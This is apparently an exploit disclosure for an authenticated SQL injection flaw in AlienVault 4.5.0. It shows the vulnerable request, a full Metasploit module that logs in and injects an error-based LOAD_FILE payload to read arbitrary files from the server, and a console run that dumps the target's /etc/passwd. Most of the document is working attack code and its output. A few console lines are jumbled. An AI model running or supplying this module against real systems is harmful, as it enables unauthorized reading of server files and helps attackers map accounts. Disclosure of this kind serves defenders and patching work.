The following request is vulnerable to a SQL injection attack from authenticated users. GET /ossim/report/BusinessAndComplianceISOPCI/ISO27001Bar1.php?date_from=2014-02-28&date_to=2014-03-30 HTTP/1.1 Host: 172.31.16.150 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://172.31.16.150/ossim/report/wizard_run.php?run=ZmRzYWZkc2EjIyNhZG1pbg== Cookie: PHPSESSID=jllhuhmphk6ma5q8q2i0hm0mr1; Connection: keep-alive ------------------------------------------------------------------------------------------------ The following metasploit module will exploit this in order to read a file off of the file system: ## ## This module requires Metasploit: http//metasploit.com/download ## Current source: https://github.com/rapid7/metasploit-framework ### require 'msf/core' class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "AlienVault 4.5.0 authenticated SQL injection arbitrary file read", 'Description' => %q{ AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG generation PHP file. This module exploits this to read an arbitrary file from the file system. Any authed user should be usable. Admin not required. }, 'License' => MSF_LICENSE, 'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' #meatpistol module ], 'References' => [ ], 'Platform' => ['linux'], 'Privileged' => false, 'DisclosureDate' => "Mar 30 2014")) register_options( [ OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd']), OptString.new('USERNAME', [ true, 'Single username', 'username']), OptString.new('PASSWORD', [ true, 'Single password', 'password']), OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/']) ], self.class) end def run res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php') }) cookie = res.get_cookies post = { 'embed' => '', 'bookmark_string' => '', 'user' => datastore['USERNAME'], 'passu' => datastore['PASSWORD'], 'pass' => Rex::Text.encode_base64(datastore['PASSWORD']) } res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php'), 'method' => 'POST', 'vars_post' => post, 'cookie' => cookie }) if res.headers['Location'] != '/ossim/' fail_with('Authentication failed') end cookie = res.get_cookies done = false i = 0 full = '' while !done pay = "2014-02-28' AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x7175777471," pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x2f6574632f706173737764)) AS CHAR)," pay << "0x20)),#{(50*i)+1},50)),0x7169716d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS" pay << " GROUP BY x)a) AND 'xnDa'='xnDa" get = { 'date_from' => pay, 'date_to' => '2014-03-30' } res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'ossim', 'report', 'BusinessAndComplianceISOPCI', 'ISO27001Bar1.php'), 'cookie' => cookie, 'vars_get' => get }) file = /quwtq(.*)qiqmq/.match(res.body) file = file[1] if file == '' done = true end str = [file].pack("H*") full << str vprint_status(str) i = i+1 end path = store_loot('alienvault.file', 'text/plain', datastore['RHOST'], full, datastore['FILEPATH']) print_good("File stored at path: " + path) end end ----------------------------------------------------------------------------- Quick run of the module: msf auxiliary(alienvault_isp27001_sqli) > show options Module options (auxiliary/gather/alienvault_isp27001_sqli): Name Current Setting Required Description ---- --------------- -------- ----------- FILEPATH /etc/passwd yes Path to remote file PASSWORD password yes Single password Proxies no Use a proxy chain RHOST 172.31.16.150 yes The target address RPORT 443 yes The target port TARGETURI / yes Relative URI of installation USERNAME username yes Single username VHOST no HTTP server virtual host msf auxiliary(alienvault_isp27001_sqli) > run [+] File stored at path: /home/bperry/.msf4/loot/20140330080922_default_172.31.16.150_alienvault.file_049766.txt [*] Auxiliary module execution completed 80922_default_172.31.16.150_alienvault.file_049766.txterry/.msf4/loot/201403300 [*] exec: cat /home/bperry/.msf4/loot/20140330080922_default_172.31.16.150_alienvault.file_049766.txt root:x:0:0:root:/root:/usr/bin/llshell daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin munin:x:102:104::/var/lib/munin:/bin/false postfix:x:103:106::/var/spool/postfix:/bin/false snmp:x:104:108::/var/lib/snmp:/bin/false hacluster:x:105:109:Heartbeat System Account,,,:/usr/lib/heartbeat:/bin/false ossec:x:1000:1000::/var/ossec/:/bin/false ossecm:x:1001:1000::/var/ossec/:/bin/false ossecr:x:1002:1000::/var/ossec/:/bin/false ntop:x:106:111::/var/lib/ntop:/bin/false snort:x:107:112:Snort IDS:/var/log/snort:/bin/false prads:x:108:113::/home/prads:/bin/false nagios:x:109:114::/var/lib/nagios:/bin/false mysql:x:110:115:MySQL Server,,,:/var/lib/mysql:/bin/false asec:x:111:116:Alienvault smart event system user,,,:/var/lib/asec:/bin/false mongodb:x:112:65534::/home/mongodb:/bin/false avserver:x:113:121:AlienVault SIEM,,,:/home/avserver:/bin/false avidm:x:114:121:AlienVault IDM,,,:/home/avidm:/bin/false stunnel4:x:115:122::/var/run/stunnel4:/bin/false avagent:x:116:121:AlienVault Agent,,,:/home/avagent:/bin/false avapi:x:117:121:AlienVault SIEM,,,:/home/avapi:/bin/bash rabbitmq:x:118:123:RabbitMQ messaging server,,,:/var/lib/rabbitmq:/bin/false avforw:x:119:121:AlienVault SIEM,,,:/home/avforw:/bin/false msf auxiliary(alienvault_isp27001_sqli) >